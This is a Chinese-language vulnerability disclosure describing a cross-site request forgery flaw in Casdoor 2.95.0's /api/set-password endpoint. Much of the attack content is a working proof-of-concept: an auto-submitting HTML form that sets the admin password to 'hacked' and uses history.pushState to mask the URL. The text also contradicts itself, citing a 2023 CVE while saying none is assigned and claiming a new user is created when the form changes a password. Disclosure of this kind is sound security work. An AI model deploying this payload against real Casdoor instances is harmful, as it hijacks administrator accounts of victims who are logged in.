Casdoor 2.95.0 CSRF漏洞分析与利用

本文详细分析了Casdoor 2.95.0版本中存在的跨站请求伪造漏洞,攻击者可通过构造恶意请求任意修改用户密码,包含完整的漏洞原理和利用代码演示。

漏洞标题:Casdoor 2.95.0 - 跨站请求伪造(CSRF)

应用:Casdoor

版本:v2.95.0 (2025-10-22)

日期:2025-10-23

漏洞作者:Van Lam Nguyen

厂商主页:https://casdoor.org/

软件链接:https://github.com/casdoor/casdoor/archive/refs/tags/v2.95.0.zip

测试环境:Windows

CVE:CVE-2023-34927(最新尚未分配)

概述

================================================== Casdoor v2.95.0及以下版本被发现存在跨站请求伪造(CSRF)漏洞,位于端点/api/set-password。 该漏洞允许攻击者通过提供精心构造的URL来任意更改受害用户的密码。

漏洞验证

==================================================

/api/set-password发起未经授权的请求,绕过了旧密码输入认证步骤

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
<html>
<form action="http://localhost:8000/api/set-password" method="POST">
    <input name='userOwner' value='built&#45;in' type='hidden'>
    <input name='userName' value='admin' type='hidden'>
    <input name='newPassword' value='hacked' type='hidden'>
    <input type=submit>
</form>
<script>
    history.pushState('', '', '/');
    document.forms[0].submit();
</script>

</html>

如果在执行时用户已登录到Casdoor Web应用程序,将在应用程序中创建具有以下凭据的新用户:

  • userOwner: built-in
  • userName: admin
  • newPassword: hacked
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计